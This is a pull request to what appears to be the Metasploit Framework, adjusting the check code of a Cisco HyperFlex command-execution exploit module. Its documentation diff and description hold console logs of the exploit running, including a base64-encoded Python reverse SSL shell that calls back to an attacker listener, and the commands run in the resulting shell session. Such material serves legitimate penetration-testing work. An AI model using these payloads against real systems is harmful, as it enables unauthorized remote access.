### PR TITLE
Fix CheckCode in exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.md
@@ -54,18 +54,18 @@ Exploit target:
    0   Unix Command
 
 
-msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set rhosts 192.168.161.3
-rhosts => 192.168.161.3
-msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set lhost 192.168.161.1
-lhost => 192.168.161.1
+msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set rhosts 172.16.57.4
+rhosts => 172.16.57.4
+msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set lhost 172.16.57.1
+lhost => 172.16.57.1
 msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run
 
-[*] Started reverse SSL handler on 192.168.161.1:4444
-[*] Executing automatic check (disable AutoCheck to override)
-[+] The target is vulnerable. Storfs ASUP servlet detected.
+[*] Started reverse SSL handler on 172.16.57.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Storfs ASUP servlet detected.
 [*] Selected cmd/unix/reverse_python_ssl (Unix Command)
-[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMTYxLjEnLDQ0NDQpKQpzPXNzbC53cmFwX3NvY2tldChzbykKc2g9RmFsc2UKd2hpbGUgbm90IHNoOgoJZGF0YT1zLnJlY3YoMTAyNCkKCWlmIGxlbihkYXRhKT09MDoKCQlzaCA9IFRydWUKCXByb2M9c3VicHJvY2Vzcy5Qb3BlbihkYXRhLHNoZWxsPVRydWUsc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSxzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLHN0ZGluPXN1YnByb2Nlc3MuUElQRSkKCXN0ZG91dF92YWx1ZT1wcm9jLnN0ZG91dC5yZWFkKCkgKyBwcm9jLnN0ZGVyci5yZWFkKCkKCXMuc2VuZChzdGRvdXRfdmFsdWUpCg==')[0]))"
-[*] Command shell session 1 opened (192.168.161.1:4444 -> 192.168.161.3:58970) at 2021-06-03 00:28:24 -0500
+[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCmx4PUZhbHNlCndoaWxlIG5vdCBseDoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJbHggPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
+[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55088) at 2021-07-06 22:24:32 -0500
 [!] Command execution timed out
 
 id

--- a/modules/exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.rb
+++ b/modules/exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe
     end
 
-    CheckCode::Vulnerable('Storfs ASUP servlet detected.')
+    CheckCode::Appears('Storfs ASUP servlet detected.')
   end
 
   def exploit


### PR DESCRIPTION
It's closer to `CheckCode::Appears` than `CheckCode::Vulnerable`, though the patch removes the endpoint.

```
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Storfs ASUP servlet detected.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCmx4PUZhbHNlCndoaWxlIG5vdCBseDoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJbHggPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55088) at 2021-07-06 22:24:32 -0500
[!] Command execution timed out

id
uid=111(tomcat7) gid=114(tomcat7) groups=114(tomcat7),42(shadow)
uname -a
Linux HyperFlex-Installer-4.0.2d 4.4.0-75-generic #96-Ubuntu SMP Thu Apr 20 09:56:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```

Fixes #15281.